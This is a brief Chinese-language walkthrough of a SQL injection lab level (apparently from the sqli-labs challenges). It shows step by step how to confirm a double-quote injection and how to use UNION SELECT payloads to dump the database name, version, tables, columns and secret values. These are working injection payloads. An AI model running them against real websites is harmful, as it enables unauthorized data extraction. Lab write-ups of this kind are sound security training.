这一关还是有14次尝试机会的 而且还是以id作为注入点的

首先输入如下语句

id=1 and 1=2

查看回显 属于字符型 

接着判断一下属于单引号还是双引号 输入1' 查看回显  正确回显

  在尝试一下双引号 输入1" 回显如下 肯定存在双引号包裹 但是是否有括号呢 不得而知 

接着佐证一下是否属于纯粹的双引号注入 输入1"--+ 查看回显 这一关是属于那种纯粹的双引号注入类型

接着进行联合注入爆回显点 输入如下

id=0" union select 1,2,3--+

回显位如下所示

接着进行爆库 版本号操作 输入如下

id=0" union select 1,database(),version()--+

回显如下

接着进行爆表操作 输入如下

id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

 回显如下

接着进行爆字段操作 输入如下

id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='jsnozszo0f'--+

 回显如下

最后进行爆用户名和密码操作 输入如下

id=0" union select 1,2,group_concat(sessid,'-',secret_20DB) from jsnozszo0f--+

 回显如下

ok 做完了 嗨嗨！！